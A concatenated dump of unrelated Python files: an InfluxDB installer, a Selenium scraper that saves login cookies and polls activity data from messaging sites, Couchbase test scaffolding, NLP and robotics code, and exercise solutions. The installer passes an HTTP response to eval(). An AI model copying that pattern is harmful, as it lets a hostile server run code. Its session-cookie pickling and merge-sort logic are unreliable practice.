{0}'.format(response))\n request_reader.close()\n common.remove('/tmp/retention.json')\n\n except Exception as ex:\n raise BootstrapError(\n 'Failed to create: {0} ({1}).'.format(db_name, ex)\n )\n\n logger.debug('Verifying database created successfully...')\n db_list = eval(urllib2.urlopen(urllib2.Request(url_for_list)).read())\n try:\n assert any(d.get('name') == db_name for d in db_list)\n except AssertionError:\n raise ValidationError('Verification failed!')\n logger.info('Databased {0} successfully created'.format(db_name))\n\n\ndef _install_influxdb():\n source_url = config[INFLUXDB][SOURCES]['influxdb_source_url']\n yum_install(source_url)\n\n\ndef _install():\n if config[INFLUXDB]['is_internal']:\n _install_influxdb()\n\n\ndef _create_paths():\n common.mkdir(HOME_DIR)\n common.mkdir(LOG_DIR)\n\n _deploy_config_file()\n\n common.chown(INFLUXDB, INFLUXDB, HOME_DIR)\n common.chown(INFLUXDB, INFLUXDB, LOG_DIR)\n\n\ndef _deploy_config_file():\n logger.info('Deploying InfluxDB configuration...')\n common.copy(\n source=join(CONFIG_PATH, 'config.toml'),\n destination=join(HOME_DIR, 'shared', 'config.toml')\n )\n\n\ndef _configure_local_influxdb():\n config[INFLUXDB][SERVICE_USER] = INFLUXDB\n config[INFLUXDB][SERVICE_GROUP] = INFLUXDB\n\n _create_paths()\n copy_notice(INFLUXDB)\n\n systemd.configure(INFLUXDB)\n # Provided with InfluxDB's package. Will be removed if it exists.\n common.remove(INIT_D_PATH)\n\n\ndef _check_response():\n influxdb_endpoint_ip = config[INFLUXDB][ENDPOINT_IP]\n influxdb_url = 'http://{0}:{1}'.format(\n influxdb_endpoint_ip,\n INFLUXDB_ENDPOINT_PORT\n )\n response = check_http_response(influxdb_url)\n\n # InfluxDB normally responds with a 404 on GET to /, but also allow other\n # non-server-error response codes to allow for that behaviour to change.\n if response.code >= 500:\n raise ValidationError('Could not validate InfluxDB')\n\n\ndef _verify_influxdb_alive():\n systemd.verify_alive(INFLUXDB)\n wait_for_port(INFLUXDB_ENDPOINT_PORT)\n _check_response()\n\n\ndef _configure():\n influxdb_endpoint_ip = config[INFLUXDB][ENDPOINT_IP]\n is_internal = config[INFLUXDB]['is_internal']\n if is_internal:\n _configure_local_influxdb()\n systemd.restart(INFLUXDB)\n\n wait_for_port(INFLUXDB_ENDPOINT_PORT, influxdb_endpoint_ip)\n _configure_database(influxdb_endpoint_ip, INFLUXDB_ENDPOINT_PORT)\n\n if is_internal:\n logger.info('Starting InfluxDB Service...')\n systemd.restart(INFLUXDB)\n _verify_influxdb_alive()\n\n\ndef install():\n logger.notice('Installing InfluxDB...')\n _install()\n _configure()\n logger.notice('InfluxDB successfully installed')\n\n\ndef configure():\n logger.notice('Configuring InfluxDB...')\n _configure()\n logger.notice('InfluxDB successfully configured')\n\n\ndef remove():\n logger.notice('Removing Influxdb...')\n remove_notice(INFLUXDB)\n systemd.remove(INFLUXDB)\n remove_files([HOME_DIR, LOG_DIR, INIT_D_PATH])\n yum_remove(INFLUXDB)\n logger.notice('InfluxDB successfully removed')\n\n\ndef start():\n is_internal = config[INFLUXDB]['is_internal']\n if is_internal:\n logger.notice('Starting Influxdb...')\n systemd.start(INFLUXDB)\n _verify_influxdb_alive()\n logger.notice('Influxdb successfully started')\n\n\ndef stop():\n is_internal = config[INFLUXDB]['is_internal']\n if is_internal:\n logger.notice('Stopping Influxdb...')\n systemd.stop(INFLUXDB)\n logger.notice('Influxdb successfully stopped')\n","sub_path":"cfy_manager/components/influxdb/influxdb.py","file_name":"influxdb.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"183361061","text":"import pickle\nfrom selenium import webdriver\nimport time\nimport os\nimport sys\nimport json\n\nfrom storage import BrowserStorage\nimport facebook\nimport telegram\nimport skype\n\nsite_parsers = {\n \"telegram\": telegram.TelegramParser,\n \"facebook\": facebook.FacebookParser,\n \"skype\": skype.SkypeParser\n}\n\nrequested_site = sys.argv[1] if len(sys.argv) > 1 else \"telegram\"\nif requested_site not in site_parsers:\n print(\"Incorrect requested site -\", requested_site, \", Supported -\", list(site_parsers.keys))\n exit(1)\nelse:\n print(\"Requested site:\", requested_site)\n\ndef ensure_folders_exist(file_name):\n if not os.path.exists(os.path.dirname(file_name)):\n os.makedirs(os.path.dirname(file_name))\n\n# disable \"Allow Notifications\" pop-up\n_browser_profile = webdriver.FirefoxProfile()\n_browser_profile.set_preference(\"dom.webnotifications.enabled\", False)\ndriver = webdriver.Firefox(firefox_profile=_browser_profile)\n\n\nwebsite_parser = site_parsers[requested_site](driver)\nloading_wait = website_parser.loading_wait\n\n\nprint(\"Navigating to the website...\")\ndriver.get(website_parser.root_url)\ndriver.implicitly_wait(loading_wait)\ntime.sleep(loading_wait)\n\nshould_login = True\n\n# load cookies if they exist\ncookie_file = website_parser.session_dir + \"cookies.pkl\"\nlocal_storage_file = website_parser.session_dir + \"localStorage.pkl\"\nsession_storage_file = website_parser.session_dir + \"sessionStorage.pkl\"\n\nif (os.path.exists(cookie_file)): # there are some cookies\n print(\"Loading cookies...\")\n print(\"Navigate to a dummy URL...\")\n driver.get(website_parser.root_url + \"dummyurl\")\n time.sleep(loading_wait)\n print(\"Add for the current website...\")\n cookies = pickle.load(open(cookie_file, \"rb\"))\n for cookie in cookies:\n driver.add_cookie(cookie)\n print(\"Loading localStorage...\")\n localStorage = BrowserStorage(driver, 'localStorage')\n localStorageData = pickle.load(open(local_storage_file, \"rb\"))\n for key, value in localStorageData.items(): localStorage.set(key, value)\n print(\"Loading sessionStorage...\")\n sessionStorage = BrowserStorage(driver, 'sessionStorage')\n sessionStorageData = pickle.load(open(session_storage_file, \"rb\"))\n for key, value in sessionStorageData.items(): sessionStorage.set(key, value)\n should_login = False\nelse:\n print(\"No cookies file\")\n\nif should_login:\n print(\"Logging in...\")\n website_parser.Authenticate()\n time.sleep(loading_wait)\n if website_parser.save_session:\n print(\"Saving logged in session in cookies...\")\n ensure_folders_exist(cookie_file)\n pickle.dump(driver.get_cookies(), open(cookie_file, \"wb\"))\n pickle.dump(BrowserStorage(driver, 'localStorage').items(), open(local_storage_file, \"wb\"))\n pickle.dump(BrowserStorage(driver, 'sessionStorage').items(), open(session_storage_file, \"wb\"))\nelse:\n print(\"Already logged in. Refreshing...\")\n driver.get(website_parser.root_url)\n time.sleep(loading_wait)\n\n# main parsing loop\ntry:\n data_file = website_parser.data_file\n while True:\n try:\n print(\"Retrieving activity data...\")\n activity_data = website_parser.ParseActivityData()\n\n print(\"Saving one entry to data file...\")\n ensure_folders_exist(data_file)\n with open(data_file, \"a\") as dfile:\n dfile.write(json.dumps(activity_data) + \"\\n\")\n\n print(\"Waiting \" + str(website_parser.parse_wait / 60) + \" minutes...\")\n time.sleep(website_parser.parse_wait)\n except KeyboardInterrupt:\n break\n except:\n time.sleep(60)\n continue\nexcept KeyboardInterrupt:\n pass\n\n\ndriver.close()\n","sub_path":"parsers/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"537033652","text":"# https://leetcode.com/explore/challenge/card/october-leetcoding-challenge/561/week-3-october-15th-october-21st/3500/\n\n# Minimum Domino Rotations For Equal Row\n\n# In a row of dominoes, A[i] and B[i] represent the top and bottom halves of the ith domino. \n# (A domino is a tile with two numbers from 1 to 6 - one on each half of the tile.)\n\n# We may rotate the ith domino, so that A[i] and B[i] swap values.\n\n# Return the minimum number of rotations so that all the values in A are the same, \n# or all the values in B are the same.\n\n# If it cannot be done, return -1.\n\n\n# Example 1:\n# Input: A = [2,1,2,4,2,2], B = [5,2,6,2,3,2]\n# Output: 2\n# Explanation: \n# The first figure represents the dominoes as given by A and B: before we do any rotations.\n# If we rotate the second and fourth dominoes, we can make every value in the top row equal \n# to 2, as indicated by the second figure.\n\n# Example 2:\n# Input: A = [3,5,1,2,3], B = [3,6,3,3,4]\n# Output: -1\n# Explanation: \n# In this case, it is not possible to rotate the dominoes to make one row of values equal.\n \n\n# Constraints:\n# 2 <= A.length == B.length <= 2 * 10^4\n# 1 <= A[i], B[i] <= 6\n\n\nfrom typing import List\ndef minDominoRotations(A: List[int], B: List[int]) -> int:\n\tn = len(A)\n\tfor target in [A[0], B[0]]:\n\t\tif all(target in [a, b] for a, b in zip(A, B)):\n\t\t\treturn n - max(A.count(target), B.count(target))\n\treturn -1\n\nassert(minDominoRotations([2,1,2,4,2,2], [5,2,6,2,3,2]) == 2)\nassert(minDominoRotations([3,5,1,2,3], [3,6,3,3,4]) == -1)\n\n\n\n\n\n\n","sub_path":"2020 October LeetCoding Challenge/19_minDominoRotations.py","file_name":"19_minDominoRotations.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"99067861","text":"sampleA = [692,1,32]\r\nsampleB = [0,0,0,14,15,123,2431]\r\n\r\ndef realWorldMergeSort(listA,listB):\r\n \"\"\"\\n\r\n [05/20/13] Challenge #126 [Easy] Real-World Merge Sort\\n\r\n Return a merged and sorted list of elements of list A into list B\r\n where you cannot allocate any extra space other than simple/trivial\r\n local variables.\r\n \"\"\"\r\n \r\n for num in listA: # Loop through listA to locate a spot in listB\r\n i = 0 # Initialize counter to loop through listB\r\n while(num > listB[i]): # If the current number pulled from listA is bigger\r\n if(listB[i] != 0): # than the element in listB and the element isn't 0,\r\n listB[i - 1] = listB[i] # copy the current element into an earlier element in\r\n i += 1 # the list. Once num is no longer greater than the\r\n listB[i - 1] = num # current element place num in the previous element\r\n # list and grab the next number in listA.\r\n return listB # Return the list we've sorted.\r\n\r\nprint(realWorldMergeSort(sampleA,sampleB))\r\n","sub_path":"easy/05202013_real-world_merge_sort.py","file_name":"05202013_real-world_merge_sort.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"155103662","text":"\"\"\"\nCreated on Feb 16, 2022\n\n@author: ritesh.agarwal\n\"\"\"\nfrom Cb_constants import CbServer\nfrom Jython_tasks.task import DeployDataplane\nfrom TestInput import TestInputSingleton\nfrom bucket_utils.bucket_ready_functions import BucketUtils\nfrom capella_utils.common_utils import Pod, Tenant\nfrom capella_utils.dedicated import CapellaUtils as DedicatedUtils\nfrom capella_utils.serverless import CapellaUtils as ServerlessUtils\nfrom cb_basetest import CouchbaseBaseTest\nfrom cluster_utils.cluster_ready_functions import ClusterUtils, CBCluster\nfrom constants.cloud_constants.capella_constants import AWS\nfrom security_config import trust_all_certs\nimport global_vars\n\n\nclass OnCloudBaseTest(CouchbaseBaseTest):\n def setUp(self):\n super(OnCloudBaseTest, self).setUp()\n\n for server in self.input.servers:\n server.type = \"serverless\"\n # End of framework parameters\n\n # Cluster level info settings\n self.servers = list()\n self.capella = self.input.capella\n self.num_dataplanes = self.input.param(\"num_dataplanes\", 1)\n\n self.wait_timeout = self.input.param(\"wait_timeout\", 120)\n CbServer.use_https = True\n trust_all_certs()\n\n # initialize pod object\n url = self.input.capella.get(\"pod\")\n self.pod = Pod(\"https://%s\" % url,\n self.input.capella.get(\"token\",\n None))\n\n self.tenant = Tenant(self.input.capella.get(\"tenant_id\"),\n self.input.capella.get(\"capella_user\"),\n self.input.capella.get(\"capella_pwd\"))\n\n self.rest_username = \\\n TestInputSingleton.input.membase_settings.rest_username\n self.rest_password = \\\n TestInputSingleton.input.membase_settings.rest_password\n\n self.log_setup_status(self.__class__.__name__, \"started\")\n self.cluster_name_format = \"C%s\"\n self.nebula_details = dict()\n\n self.tenant.project_id = \\\n TestInputSingleton.input.capella.get(\"project\", None)\n if not self.tenant.project_id:\n DedicatedUtils.create_project(self.pod, self.tenant, \"a_taf_run\")\n\n # Comma separated cluster_ids [Eg: 123-456-789,111-222-333,..]\n self.cb_image = self.input.capella.get(\"cb_image\", \"\")\n self.dapi_image = self.input.capella.get(\"dapi_image\", \"\")\n self.dn_image = self.input.capella.get(\"dn_image\", \"\")\n self.dataplane_id = self.input.capella.get(\"dataplane\", \"\")\n num_dataplanes = self.input.param(\"num_dataplanes\", 0)\n self.cluster = CBCluster(username=self.rest_username,\n password=self.rest_password,\n servers=[None] * 40)\n self.cluster.pod = self.pod\n self.cluster.tenant = self.tenant\n self.cluster.type = \"serverless\"\n\n tasks = list()\n self.dataplanes = list()\n for _ in range(num_dataplanes):\n self.generate_dataplane_config()\n self.log.info(self.dataplane_config)\n deploy_task = DeployDataplane(self.cluster,\n self.dataplane_config,\n timeout=self.wait_timeout)\n self.task_manager.add_new_task(deploy_task)\n tasks.append(deploy_task)\n for deploy_task in tasks:\n self.task_manager.get_task_result(deploy_task)\n self.assertTrue(deploy_task.result, \"Dataplane deployment failed!\")\n self.dataplanes.append(deploy_task.dataplane_id)\n\n if self.dataplanes:\n self.dataplane_id = self.dataplanes[0]\n\n self.cluster_util = ClusterUtils(self.task_manager)\n self.bucket_util = BucketUtils(self.cluster_util, self.task)\n self.serverless_util = ServerlessUtils(self.cluster)\n global_vars.serverless_util = self.serverless_util\n\n def tearDown(self):\n self.shutdown_task_manager()\n if self.sdk_client_pool:\n self.sdk_client_pool.shutdown()\n\n if self.skip_teardown_cleanup:\n return\n for bucket in self.cluster.buckets:\n self.log.info(\"Deleting database: {}\".format(bucket.name))\n self.serverless_util.delete_database(self.pod, self.tenant, bucket.name)\n\n for bucket in self.cluster.buckets:\n self.serverless_util.wait_for_database_deleted(self.tenant, bucket.name)\n\n for dataplane_id in self.dataplanes:\n self.log.info(\"Destroying dataplane: {}\".format(dataplane_id))\n self.serverless_util.delete_dataplane(dataplane_id)\n if not TestInputSingleton.input.capella.get(\"project\", None):\n DedicatedUtils.delete_project(self.pod, self.tenant)\n\n def generate_dataplane_config(self):\n provider = self.input.param(\"provider\", AWS.__str__).lower()\n region = self.input.param(\"region\", AWS.Region.US_EAST_1)\n self.dataplane_config = {\n \"provider\": provider,\n \"region\": region,\n \"overRide\": {\n \"couchbase\": {\n \"image\": self.cb_image,\n \"version\": \"7.2.0\",\n }\n }\n }\n if self.dn_image:\n self.dataplane_config[\"overRide\"].update(\n {\n \"nebula\": {\n \"image\": self.dn_image\n }\n }\n )\n if self.dapi_image:\n self.dataplane_config[\"overRide\"].update(\n {\n \"dataApi\": {\n \"image\": self.dapi_image\n }\n }\n )\n\n\nclass ClusterSetup(OnCloudBaseTest):\n def setUp(self):\n super(ClusterSetup, self).setUp()\n\n self.log_setup_status(\"ClusterSetup\", \"started\", \"setup\")\n\n # Print cluster stats\n self.cluster_util.print_cluster_stats(self.cluster)\n self.log_setup_status(\"ClusterSetup\", \"complete\", \"setup\")\n\n def tearDown(self):\n super(ClusterSetup, self).tearDown()\n","sub_path":"pytests/serverlessbasetestcase.py","file_name":"serverlessbasetestcase.py","file_ext":"py","file_size_in_byte":6121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"27127863","text":"import pandas as pd\nimport nltk\nfrom gensim import corpora, models, similarities\nimport gensim\nfrom nltk.corpus import stopwords\nimport sys\nreload(sys)\nimport numpy as np\nfrom gensim.corpora import Dictionary, MmCorpus\nimport re\nimport string\nsys.setdefaultencoding('utf-8')\nimport logging\nimport StopWord\n\nfrom PConfig import PConfig\nfrom PConstant import PConstant\n\n\nclass TopicDriver(object):\n\n def __init__(self, datarecord, colnnames, delimtr):\n self._flogger()\n self.datarecord = datarecord\n self.df = pd.read_csv(self.datarecord, names=colnnames, delimiter=delimtr)\n self.stopwords = StopWord.EnglishStopWord().stopwords()\n \n\n def __cleanze(self, textcolname):\n self._logger.info(\"tokenzing = '%s' \", textcolname)\n self.df[\"tokenized\"] = self.df[textcolname].astype(unicode).apply(nltk.word_tokenize)\n\n def filterfunc(x):\n fx = []\n for item in x:\n if item not in self.stopwords:\n if len(item) > 3:\n if not item.isdigit():\n if not re.search('[0-9]', item):\n if item.isalpha():\n fx.append(item.lower())\n return fx\n self._logger.info(\"filtering = '%s' \", textcolname)\n self.df['tokens'] = self.df['tokenized'].apply(filterfunc)\n\n def __corpus(self):\n \n def nltk_stopwords():\n return set(nltk.corpus.stopwords.words('english'))\n\n def prep_corpus(docs, additional_stopwords=set(), no_below=2, no_above=0.05):\n\n dictionary = Dictionary(docs)\n stopwords = nltk_stopwords().union(additional_stopwords)\n stopword_ids = map(dictionary.token2id.get, stopwords)\n dictionary.filter_tokens(stopword_ids)\n dictionary.compactify()\n dictionary.filter_extremes(no_below=no_below, no_above=no_above, keep_n=None)\n dictionary.compactify()\n corpus = [dictionary.doc2bow(doc) for doc in docs]\n\n return dictionary, corpus\n\n dictionary, corpus = prep_corpus(self.df['tokens'], ['nbsp', '.', ',', '\"', \"'\", '?', '!','>', ':', ';', '(', ')', '[', ']', '{', '}','/', '.com'])\n return (dictionary, corpus)\n\n def __model(self):\n\n lda = gensim.models.ldamodel.LdaModel(corpus=self.corpus, id2word=self.dictionary, num_topics=self.num_topics, passes=self.passes) \n return lda\n\n def discover(self, textcolname, num_topics, passes):\n self.num_topics = num_topics\n self.passes = passes\n self._logger.info(\"cleanzing data for '%s'\", textcolname)\n self.__cleanze(textcolname)\n self._logger.info(\"creating corpus and dictionary for '%s'\", textcolname)\n self.dictionary, self.corpus = self.__corpus()\n self._logger.info(\"applying lda model '%s'\", textcolname)\n self.lda = self.__model()\n self._logger.info(\"saving models for '%s'\", textcolname)\n MmCorpus.serialize(PConstant.CORPUS_DIR_PATH.value + textcolname +'_corpus.mm', self.corpus)\n self.dictionary.save( PConstant.DICTIONARY_DIR_PATH.value + textcolname + '_dictionary.dict')\n self.lda.save( PConstant.LDA_DIR_PATH.value + textcolname + '_lda.model')\n\n def _flogger(self):\n\n self._logger = logging.getLogger('TopicDriver')\n self._logger.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(formatter)\n self._logger.addHandler(ch)\n\n","sub_path":"TopicDriver.py","file_name":"TopicDriver.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"549652793","text":"import random\n\nFILENAME = \"database.txt\"\n\nROW_COUNT = 140\n\nTOURISM = [i for i in range(3)]\nEXCURSION = [i for i in range(3)]\nSEASON = [i for i in range(4)]\nSPORT = [i for i in range(3)]\nMAINLAND = [i for i in range(5)]\n\ndef gen_county_capital_list():\n data = []\n with open(\"countries.cvs\", \"r\") as f:\n s = f.readline()\n\n i = 0\n while \"\" != s:\n s = f.readline()\n row = s.split(\",\")[:2]\n for i in range(len(row)):\n row[i] = row[i].replace('\"', '')\n # row[i] = row[i].replace('\\n', '')\n\n data.append(row)\n data.pop()\n\n return data\n\ndef is_char_alphabetic(char):\n if (ord(char) not in range(ord('a'), ord('z') + 1) and\n ord(char) not in range(ord('A'), ord('Z') + 1)):\n return False\n\n return True\n\ndef is_word_alhabetic(word):\n for char in word:\n if not is_char_alphabetic(char):\n return False\n\n return True\n\ndef process_data(data):\n new_data = []\n for country, capital in data:\n if is_word_alhabetic(country) and is_word_alhabetic(capital):\n new_data.append((country, capital))\n return new_data\n\ndef uint32_t():\n return str(random.randrange(2**32))\n\ndef int32_t():\n return str(random.randrange(-2**31, 2**31))\n\ndef main():\n country_capital = gen_county_capital_list()\n country_capital = process_data(country_capital)\n\n random.shuffle(country_capital)\n\n data = []\n\n print(\"Len:\", min(len(country_capital), ROW_COUNT))\n for i in range(min(len(country_capital), ROW_COUNT)):\n row = \"\"\n\n el = country_capital.pop()\n row += (el[0].replace(\" \", \"_\")[:10] + \" \" + uint32_t() + \" \" +\n el[1].replace(\" \", \"_\")[:10] + \" \" +\n str(random.choice(MAINLAND)))\n\n ch = random.choice(TOURISM)\n row += \" \" + str(ch) + \" \"\n\n if 0 == ch:\n row += (uint32_t() +\" \"+\n str(random.choice(EXCURSION)))\n elif 1 == ch:\n row += (str(random.choice(SEASON)) +\" \"+\n int32_t() +\" \"+\n int32_t() +\" \"+\n uint32_t())\n elif 2 == ch:\n row += (str(random.choice(SPORT)) + \" \" +\n uint32_t())\n else:\n assert(false)\n data.append(row)\n\n with open(FILENAME, \"w\") as f:\n for i in range(len(data)):\n f.write(data[i] + \"\\n\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"lab_02/gen_file.py","file_name":"gen_file.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"15829184","text":"import torch\n\nimport itertools\nimport math\nimport os\n\nfrom .. import data\n\n\nclass LanguageModelingDataset(data.Dataset):\n\n def __init__(self, path, fields, newline_eos=True, **kwargs):\n\n if not isinstance(fields, (tuple, list)):\n fields = [('text', fields)]\n\n field = fields[0][1]\n\n path = os.path.expanduser(path)\n\n text = []\n with open(path) as f:\n for line in f:\n text += field.preprocess(line)\n if newline_eos:\n text.append('')\n\n examples = [data.Example.fromlist([text], fields)]\n\n # chunks = itertools.zip_longest(*[iter(text)] * field.fix_length,\n # fillvalue='')\n # target_chunks = itertools.zip_longest(\n # *[iter(text[1:] + [''])] * field.fix_length, fillvalue='')\n\n # examples = [data.Example.fromlist([chunk, target_chunk], fields)\n # for chunk, target_chunk in zip(chunks, target_chunks)]\n\n super().__init__(examples, fields, **kwargs)\n\n\nclass WikiText2(LanguageModelingDataset, data.ZipDataset):\n\n url = 'https://s3.amazonaws.com/research.metamind.io/wikitext/wikitext-2-v1.zip'\n filename = 'wikitext-2-v1.zip'\n dirname = 'wikitext-2'\n\n @classmethod\n def splits(cls, field, root='.', train='train.tokens', dev='valid.tokens',\n test='test.tokens'):\n path = cls.download_or_unzip(root)\n return super().splits(os.path.join(path, 'wiki.'), train, dev, test,\n fields=field)\n\n @classmethod\n def iters(cls, batch_size=32, bptt_len=35, device=0, root='.',\n wv_path=None, **kwargs):\n TEXT = data.Field(time_series=True)\n\n train, dev, test = cls.splits(TEXT, root=root, **kwargs)\n\n TEXT.build_vocab(train, wv_path=wv_path)\n\n return data.BPTTIterator.splits(\n (train, dev, test), batch_size=batch_size, bptt_len=bptt_len,\n device=device)\n","sub_path":"torchtext/datasets/language_modeling.py","file_name":"language_modeling.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"395414573","text":"from django.urls import path\nfrom users import views\n\nurlpatterns = [\n path('check/id//', views.IsExistId),\n path('check/email//', views.IsExistEmail),\n path('user/create/', views.UserCreateAPI.as_view()),\n path('user/create/verify/', views.UserCreateVerify),\n path('user/info/', views.AuthInfoGetView.as_view()),\n path('user/update/', views.AuthInfoUpdateview.as_view()),\n path('user/follows/', views.UserFollowsGetView.as_view()),\n path('isFollow///', views.IsFollow),\n path('user/pub_data//', views.PublicUserDataView.as_view()),\n path('follow/delete//', views.FollowRelationDeleteView.as_view()),\n path('follow/create/', views.FollowRelationCreateView.as_view()),\n path('profile/update/', views.ProfileUpdateView.as_view()),\n path('profile/read/', views.ProfileReadView.as_view()),\n]\n","sub_path":"users/urls/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"403777716","text":"from dxl2 import Motor, Connection, Instruction, MotorType\nfrom math import sqrt, acos, pi\nfrom time import sleep\n\nimport math\n\n\nconn = Connection(\"/dev/tty.usbserial-A5052MJ8\")\nconn.open_port()\n\nm_upper = Motor(conn, 5, MotorType.AX)\nm_lower = Motor(conn, 4, MotorType.AX)\nm_pencil = Motor(conn, 6, MotorType.AX)\n\nm_upper.write(Instruction.MOVING_SPEED, 100)\nm_lower.write(Instruction.MOVING_SPEED, 100)\n\nm_upper.write(Instruction.TORQUE_ENABLE, 1)\nm_lower.write(Instruction.TORQUE_ENABLE, 1)\n\nPENCIL_UP = 608\nPENCIL_DOWN = 502\n\n\ndef to_degree(x):\n return x * 180 / pi\n\ndef map(x, in_min, in_max, out_min, out_max):\n ret = (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min\n return int(ret)\n\ndef move_to(\n x, y\n): # (x, y) are coords to move to. z is positon of arm either to be up or down. a is for the stationary motor. b is for gripper angle initially.\n # lengths\n l1 = 10 # shoulder to elbow\n l2 = 14 # elbow to wrist\n r = sqrt(x ** 2 + y ** 2)\n\n if r > (l1 + l2):\n print(\"math error: \", r, l1 + l2)\n return\n\n theta_2 = pi - acos((l1 ** 2 + l2 ** 2 - r ** 2) / (2 * l1 * l2))\n theta_1 = acos(x / r) - acos((l1 ** 2 + r ** 2 - l2 ** 2) / (2 * l1 * r))\n\n theta_1 = theta_1 - pi / 2\n\n theta_1 = to_degree(theta_1)\n theta_2 = to_degree(theta_2)\n\n print(f\"theta_1: {theta_1}\")\n print(f\"theta_2: {theta_2}\")\n\n theta_2 = map(theta_2, -150, +150, 0, 1023)\n theta_1 = map(theta_1, -150, +150, 0, 1023)\n\n m_upper.write(Instruction.GOAL_POSITION, theta_2)\n m_lower.write(Instruction.GOAL_POSITION, theta_1)\n\n# for x_start in rage()\n# move_to(0, 17)\n\n\ndef y(x):\n return x ** 2 + 12\n\n# print(m_pencil.write(Instruction.GOAL_POSITION, PENCIL_UP))\n# print(m_lower.write(Instruction.GOAL_POSITION, 800))\n# move_to(0, 24)\n# sleep(2)\n\nx_start = -2\n\n# m_pencil.write(Instruction.GOAL_POSITION, PENCIL_DOWN)\nwhile x_start <= +10:\n move_to(x_start, y(x_start))\n x_start += 0.05\n sleep(1)\n","sub_path":"arm.py","file_name":"arm.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"361252763","text":"#!/usr/bin/python\n\n## @file\n# Contains helper methods for various tasks.\n\n# import avango-guacamole libraries\nimport avango\nimport avango.gua\nimport avango.script\n\n# import framework libraries\nfrom SceneManager import SceneManager\n\n# import python libraries\nimport math\n\n## Converts a rotation matrix to the Euler angles yaw, pitch and roll.\n# @param MATRIX The rotation matrix to be converted.\ndef get_euler_angles(MATRIX):\n\n quat = MATRIX.get_rotate()\n qx = quat.x\n qy = quat.y\n qz = quat.z\n qw = quat.w\n\n sqx = qx * qx\n sqy = qy * qy\n sqz = qz * qz\n sqw = qw * qw\n \n unit = sqx + sqy + sqz + sqw # if normalised is one, otherwise is correction factor\n test = (qx * qy) + (qz * qw)\n\n if test > 1:\n yaw = 0.0\n roll = 0.0\n pitch = 0.0\n\n if test > (0.49999 * unit): # singularity at north pole\n yaw = 2.0 * math.atan2(qx,qw)\n roll = math.pi/2.0\n pitch = 0.0\n elif test < (-0.49999 * unit): # singularity at south pole\n yaw = -2.0 * math.atan2(qx,qw)\n roll = math.pi/-2.0\n pitch = 0.0\n else:\n yaw = math.atan2(2.0 * qy * qw - 2.0 * qx * qz, 1.0 - 2.0 * sqy - 2.0 * sqz)\n roll = math.asin(2.0 * test)\n pitch = math.atan2(2.0 * qx * qw - 2.0 * qy * qz, 1.0 - 2.0 * sqx - 2.0 * sqz)\n\n if yaw < 0.0:\n yaw += 2.0 * math.pi\n\n if pitch < 0:\n pitch += 2 * math.pi\n \n if roll < 0:\n roll += 2 * math.pi\n\n return yaw, pitch, roll\n\n\n## Extracts the yaw (head) rotation from a rotation matrix.\n# @param MATRIX The rotation matrix to extract the angle from.\ndef get_yaw(MATRIX):\n\n try:\n _yaw, _, _ = get_euler_angles(MATRIX)\n return _yaw\n except:\n return 0\n\n\n## Returns the rotation matrix of the rotation between two input vectors.\n# @param VEC1 First vector.\n# @param VEC2 Second vector.\ndef get_rotation_between_vectors(VEC1, VEC2):\n\n VEC1.normalize()\n VEC2.normalize() \n\n _angle = math.degrees(math.acos(VEC1.dot(VEC2)))\n _axis = VEC1.cross(VEC2)\n\n return avango.gua.make_rot_mat(_angle, _axis)\n\n## Returns the Euclidean distance between two points.\n# @param POINT1 Starting point.\n# @param POINT2 End point.\ndef euclidean_distance(POINT1, POINT2):\n _diff_x = POINT2.x - POINT1.x\n _diff_y = POINT2.y - POINT1.y\n _diff_z = POINT2.z - POINT1.z\n\n return math.sqrt(math.pow(_diff_x, 2) + math.pow(_diff_y, 2) + math.pow(_diff_z, 2))\n\n## Computes the distance between a Point and a 3D-line.\n# @param POINT_TO_CHECK The point to compute the distance for.\n# @param LINE_POINT_1 One point lying on the line.\n# @param LINE_VEC Direction vector of the line.\ndef compute_point_to_line_distance(POINT_TO_CHECK, LINE_POINT_1, LINE_VEC):\n\n _point_line_vec = avango.gua.Vec3(LINE_POINT_1.x - POINT_TO_CHECK.x, LINE_POINT_1.y - POINT_TO_CHECK.y, LINE_POINT_1.z - POINT_TO_CHECK.z)\n\n _dist = (_point_line_vec.cross(LINE_VEC)).length() / LINE_VEC.length()\n\n return _dist\n\ndef compute_plane(POINT1, POINT2, POINT3):\n\n _v1 = POINT1 - POINT3\n _v2 = POINT2 - POINT3\n _v1.normalize()\n _v2.normalize()\n \n _n = _v1.cross(_v2)\n _n.normalize()\n \n _d = - _n.dot(POINT1)\n return (_n, _d)\n\ndef compute_point_plane_distance(N, D, POINT):\n\n # compute point plane distance: <0.0 --> in front of plane: >0.0 behind plane\n return N.x * POINT.x + N.y * POINT.y + N.z * POINT.z + D\n\n\n## Checks if a point is inside the viewing frustum of a user.\n# @param POINT The point to be checked.\n# @param USER_REPRESENTATION The UserRepresentation instance to which SCREEN is belonging to.\n# @param SCREEN The screen to create the viewing frustum for. \ndef is_inside_frustum(POINT, USER_REPRESENTATION, SCREEN):\n\n 